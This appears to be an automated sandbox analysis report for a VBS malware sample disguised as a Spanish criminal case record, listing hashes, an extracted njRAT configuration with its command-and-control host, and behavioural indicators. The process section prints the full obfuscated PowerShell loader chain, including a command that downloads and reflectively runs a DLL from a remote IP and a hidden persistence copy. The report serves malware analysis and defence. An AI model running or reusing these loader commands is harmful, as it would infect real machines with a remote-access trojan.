Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
01/09/2022, 17:17
Static task
static1
Behavioral task
behavioral1
Sample
Acta Referencial Del Caso Penal RDV-09939778312.vbs
Resource
win7-20220812-en
General
-
Target
Acta Referencial Del Caso Penal RDV-09939778312.vbs
-
Size
344KB
-
MD5
f756f1aa3b657845808b1b6dd2e417c6
-
SHA1
d3f93f3093a7b6491890fcb816ddd4dc0b498fe0
-
SHA256
7d7b58a161db20052b11323229ef2a0289d7bd60fa43ae054589b9d3f895cde5
-
SHA512
d0904aff71248c4e3b3a6267b79de255d77a52f6b90578e68f769bee70d56e521fbf2f10ae7864c26be5b8dd54b6f2914885cced6ec1551a9b98dfa482d274aa
-
SSDEEP
96:LELC6OuuvYUZelhkMtm0eW2hCugT5fqR+5Z9fAWxn42Of7bsITJYYmI1e5fKq373:TLgMmZ9YI0zwNYmtSqLyzfu
Malware Config
Extracted
http://20.7.14.99/server/dll.txt
Extracted
njrat
0.7NC
NYAN CAT
agostiando.duckdns.org:8080
12b010cb2cf4431e
-
reg_key
12b010cb2cf4431e
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 13 4532 powershell.exe 15 4532 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4532 set thread context of 4624 4532 powershell.exe 93 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4264 powershell.exe 4264 powershell.exe 4532 powershell.exe 4532 powershell.exe 4536 powershell.exe 4536 powershell.exe 4532 powershell.exe 4532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 4264 powershell.exe Token: SeDebugPrivilege 4532 powershell.exe Token: SeDebugPrivilege 4536 powershell.exe Token: SeDebugPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe Token: 33 4624 RegAsm.exe Token: SeIncBasePriorityPrivilege 4624 RegAsm.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 524 wrote to memory of 4264 524 WScript.exe 84 PID 524 wrote to memory of 4264 524 WScript.exe 84 PID 4264 wrote to memory of 4532 4264 powershell.exe 86 PID 4264 wrote to memory of 4532 4264 powershell.exe 86 PID 4532 wrote to memory of 4536 4532 powershell.exe 87 PID 4532 wrote to memory of 4536 4532 powershell.exe 87 PID 4532 wrote to memory of 400 4532 powershell.exe 92 PID 4532 wrote to memory of 400 4532 powershell.exe 92 PID 4532 wrote to memory of 400 4532 powershell.exe 92 PID 4532 wrote to memory of 4624 4532 powershell.exe 93 PID 4532 wrote to memory of 4624 4532 powershell.exe 93 PID 4532 wrote to memory of 4624 4532 powershell.exe 93 PID 4532 wrote to memory of 4624 4532 powershell.exe 93 PID 4532 wrote to memory of 4624 4532 powershell.exe 93 PID 4532 wrote to memory of 4624 4532 powershell.exe 93 PID 4532 wrote to memory of 4624 4532 powershell.exe 93 PID 4532 wrote to memory of 4624 4532 powershell.exe 93
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Acta Referencial Del Caso Penal RDV-09939778312.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⏏⏏Bw⏏⏏Ek⏏⏏QwB3⏏⏏HY⏏⏏I⏏⏏⏏⏏9⏏⏏C⏏⏏⏏⏏Jw⏏⏏l⏏⏏G8⏏⏏YgB6⏏⏏GU⏏⏏cQB1⏏⏏Gk⏏⏏bw⏏⏏l⏏⏏Cc⏏⏏OwBb⏏⏏EI⏏⏏eQB0⏏⏏GU⏏⏏WwBd⏏⏏F0⏏⏏I⏏⏏⏏⏏k⏏⏏EQ⏏⏏T⏏⏏BM⏏⏏C⏏⏏⏏⏏PQ⏏⏏g⏏⏏Fs⏏⏏UwB5⏏⏏HM⏏⏏d⏏⏏Bl⏏⏏G0⏏⏏LgBD⏏⏏G8⏏⏏bgB2⏏⏏GU⏏⏏cgB0⏏⏏F0⏏⏏Og⏏⏏6⏏⏏EY⏏⏏cgBv⏏⏏G0⏏⏏QgBh⏏⏏HM⏏⏏ZQ⏏⏏2⏏⏏DQ⏏⏏UwB0⏏⏏HI⏏⏏aQBu⏏⏏Gc⏏⏏K⏏⏏⏏⏏o⏏⏏E4⏏⏏ZQB3⏏⏏C0⏏⏏TwBi⏏⏏Go⏏⏏ZQBj⏏⏏HQ⏏⏏I⏏⏏BO⏏⏏GU⏏⏏d⏏⏏⏏⏏u⏏⏏Fc⏏⏏ZQBi⏏⏏EM⏏⏏b⏏⏏Bp⏏⏏GU⏏⏏bgB0⏏⏏Ck⏏⏏LgBE⏏⏏G8⏏⏏dwBu⏏⏏Gw⏏⏏bwBh⏏⏏GQ⏏⏏UwB0⏏⏏HI⏏⏏aQBu⏏⏏Gc⏏⏏K⏏⏏⏏⏏n⏏⏏Gg⏏⏏d⏏⏏B0⏏⏏H⏏⏏⏏⏏Og⏏⏏v⏏⏏C8⏏⏏Mg⏏⏏w⏏⏏C4⏏⏏Nw⏏⏏u⏏⏏DE⏏⏏N⏏⏏⏏⏏u⏏⏏Dk⏏⏏OQ⏏⏏v⏏⏏HM⏏⏏ZQBy⏏⏏HY⏏⏏ZQBy⏏⏏C8⏏⏏Z⏏⏏Bs⏏⏏Gw⏏⏏LgB0⏏⏏Hg⏏⏏d⏏⏏⏏⏏n⏏⏏Ck⏏⏏KQ⏏⏏7⏏⏏Fs⏏⏏UwB5⏏⏏HM⏏⏏d⏏⏏Bl⏏⏏G0⏏⏏LgBB⏏⏏H⏏⏏⏏⏏c⏏⏏BE⏏⏏G8⏏⏏bQBh⏏⏏Gk⏏⏏bgBd⏏⏏Do⏏⏏OgBD⏏⏏HU⏏⏏cgBy⏏⏏GU⏏⏏bgB0⏏⏏EQ⏏⏏bwBt⏏⏏GE⏏⏏aQBu⏏⏏C4⏏⏏T⏏⏏Bv⏏⏏GE⏏⏏Z⏏⏏⏏⏏o⏏⏏CQ⏏⏏R⏏⏏BM⏏⏏Ew⏏⏏KQ⏏⏏u⏏⏏Ec⏏⏏ZQB0⏏⏏FQ⏏⏏eQBw⏏⏏GU⏏⏏K⏏⏏⏏⏏n⏏⏏EM⏏⏏b⏏⏏Bh⏏⏏HM⏏⏏cwBM⏏⏏Gk⏏⏏YgBy⏏⏏GE⏏⏏cgB5⏏⏏DM⏏⏏LgBD⏏⏏Gw⏏⏏YQBz⏏⏏HM⏏⏏MQ⏏⏏n⏏⏏Ck⏏⏏LgBH⏏⏏GU⏏⏏d⏏⏏BN⏏⏏GU⏏⏏d⏏⏏Bo⏏⏏G8⏏⏏Z⏏⏏⏏⏏o⏏⏏Cc⏏⏏UgB1⏏⏏G4⏏⏏Jw⏏⏏p⏏⏏C4⏏⏏SQBu⏏⏏HY⏏⏏bwBr⏏⏏GU⏏⏏K⏏⏏⏏⏏k⏏⏏G4⏏⏏dQBs⏏⏏Gw⏏⏏L⏏⏏⏏⏏g⏏⏏Fs⏏⏏bwBi⏏⏏Go⏏⏏ZQBj⏏⏏HQ⏏⏏WwBd⏏⏏F0⏏⏏I⏏⏏⏏⏏o⏏⏏Cc⏏⏏YQ⏏⏏1⏏⏏DM⏏⏏ZQBk⏏⏏GM⏏⏏NQ⏏⏏3⏏⏏DY⏏⏏YwBk⏏⏏DM⏏⏏LQ⏏⏏w⏏⏏Dc⏏⏏Z⏏⏏Bi⏏⏏C0⏏⏏NQ⏏⏏y⏏⏏Dg⏏⏏N⏏⏏⏏⏏t⏏⏏GI⏏⏏YQBk⏏⏏DQ⏏⏏LQ⏏⏏2⏏⏏DE⏏⏏O⏏⏏Bj⏏⏏DM⏏⏏Z⏏⏏⏏⏏1⏏⏏GY⏏⏏PQBu⏏⏏GU⏏⏏awBv⏏⏏HQ⏏⏏JgBh⏏⏏Gk⏏⏏Z⏏⏏Bl⏏⏏G0⏏⏏PQB0⏏⏏Gw⏏⏏YQ⏏⏏/⏏⏏HQ⏏⏏e⏏⏏B0⏏⏏C4⏏⏏YQBz⏏⏏GU⏏⏏cgBU⏏⏏GM⏏⏏dQBE⏏⏏C8⏏⏏bw⏏⏏v⏏⏏G0⏏⏏bwBj⏏⏏C4⏏⏏d⏏⏏Bv⏏⏏H⏏⏏⏏⏏cwBw⏏⏏H⏏⏏⏏⏏YQ⏏⏏u⏏⏏DI⏏⏏Ng⏏⏏w⏏⏏GQ⏏⏏O⏏⏏⏏⏏t⏏⏏HM⏏⏏ZQBu⏏⏏G8⏏⏏aQBj⏏⏏GE⏏⏏YwBp⏏⏏G4⏏⏏bwBt⏏⏏G8⏏⏏YwBl⏏⏏Gw⏏⏏ZQB0⏏⏏C8⏏⏏Yg⏏⏏v⏏⏏D⏏⏏⏏⏏dg⏏⏏v⏏⏏G0⏏⏏bwBj⏏⏏C4⏏⏏cwBp⏏⏏H⏏⏏⏏⏏YQBl⏏⏏Gw⏏⏏ZwBv⏏⏏G8⏏⏏Zw⏏⏏u⏏⏏GU⏏⏏ZwBh⏏⏏HI⏏⏏bwB0⏏⏏HM⏏⏏ZQBz⏏⏏GE⏏⏏YgBl⏏⏏HI⏏⏏aQBm⏏⏏C8⏏⏏Lw⏏⏏6⏏⏏HM⏏⏏c⏏⏏B0⏏⏏HQ⏏⏏a⏏⏏⏏⏏n⏏⏏Ck⏏⏏KQ⏏⏏=';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⏏⏏','A') ) ).replace('%obzequio%','');powershell.exe -Command $VXdfe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('a53edc576cd3-07db-5284-bad4-618c3d5f=nekot&aidem=tla?txt.aserTcuD/o/moc.topsppa.260d8-senoicacinomocelet/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4536
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:400
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4624
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD57ae41ba310b3e0f4fc4c6eff982554fd
SHA11a382df614c494ff947f88817b9f0fbc76de3a68
SHA25693939edea4456184f43eeffda4f6e82f125bf5cead24cebcf317aa3fe83efcce
SHA5128e13185cab71046bb411dae56ccaabd547d3bf961c200fc307f2961eb9caf175dd08631ecf6512578dd333dac3640e653f93115c840b3344648f2a597e789223
-
Filesize
64B
MD5feadc4e1a70c13480ef147aca0c47bc0
SHA1d7a5084c93842a290b24dacec0cd3904c2266819
SHA2565b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23